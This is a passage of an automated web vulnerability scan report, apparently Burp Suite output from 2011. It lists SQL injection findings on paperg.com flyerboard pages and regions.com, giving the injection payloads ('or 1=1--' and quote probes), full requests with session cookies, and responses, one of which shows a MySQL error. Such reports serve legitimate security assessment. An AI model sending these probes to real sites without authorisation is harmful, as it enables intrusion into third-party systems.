Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.25. http://www.paperg.com/flyerboard/seton-health/1552/45970.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/seton-health/1552/45970.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 67668881%20or%201%3d1--%20 and 67668881%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/seton-health/155267668881%20or%201%3d1--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3873
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Seton Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Seton Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7346/5seton130513288645970.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <
...[SNIP]...

Request 2

GET /flyerboard/seton-health/155267668881%20or%201%3d2--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.26. http://www.paperg.com/flyerboard/seton-health/1753/45970.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/seton-health/1753/45970.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16695011%20or%201%3d1--%20 and 16695011%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/seton-health/175316695011%20or%201%3d1--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3873
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Seton Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Seton Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7346/5seton130513288645970.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <
...[SNIP]...

Request 2

GET /flyerboard/seton-health/175316695011%20or%201%3d2--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.27. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/your-business-or-event-could-be-here/1552/222.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15969208%20or%201%3d1--%20 and 15969208%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/your-business-or-event-could-be-here/155215969208%20or%201%3d1--%20/222.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4596
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Your Business or Event Could Be Here - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Your Business or Event Could Be Here" />
   
   <meta name="description" content = "Looking to publicize your business or event? Post a flyer on the Flyerboard to reach hundreds of thousands of local residents. Upload any image and the Flyer..." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/166/40flyerboard_your_flyer_here.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END :
...[SNIP]...

Request 2

GET /flyerboard/your-business-or-event-could-be-here/155215969208%20or%201%3d2--%20/222.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.28. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The bid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552' HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47808


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1552''' at line 1
   var view_all_board = document.getElementById("view_all_board");
   if(view_all_bo
...[SNIP]...

Request 2

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552'' HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47689


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
1.29. http://www.regions.com/about_regions/company_info.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/company_info.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/company_info.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/wrapperHeader.aspx?p=477
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557549322:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/company_info.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2fcompany_info.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/company_info.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/wrapperHeader.aspx?p=477
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557549322:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.30. http://www.regions.com/about_regions/email_fraud.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/email_fraud.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/email_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/protecting_self_online.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557307425:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:49:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/email_fraud.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2femail_fraud.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/email_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/protecting_self_online.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557307425:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:49:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.31. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/privacy_security.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/privacy_security.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305556924172:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:43:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/privacy_security.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2fprivacy_security.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/privacy_security.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305556924172:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:43:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.32. http://www.regions.com/about_regions/protecting_self_online.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/protecting_self_online.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/protecting_self_online.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/report_fraud.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557020647:ss=1305556924172

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/protecting_self_online.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/report_fraud.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557020647:ss=1305556924172

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:48:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
1.33. http://www.regions.com/about_regions/report_fraud.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/report_fraud.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/report_fraud.rf HTTP/1.1
Host: www.regions.com
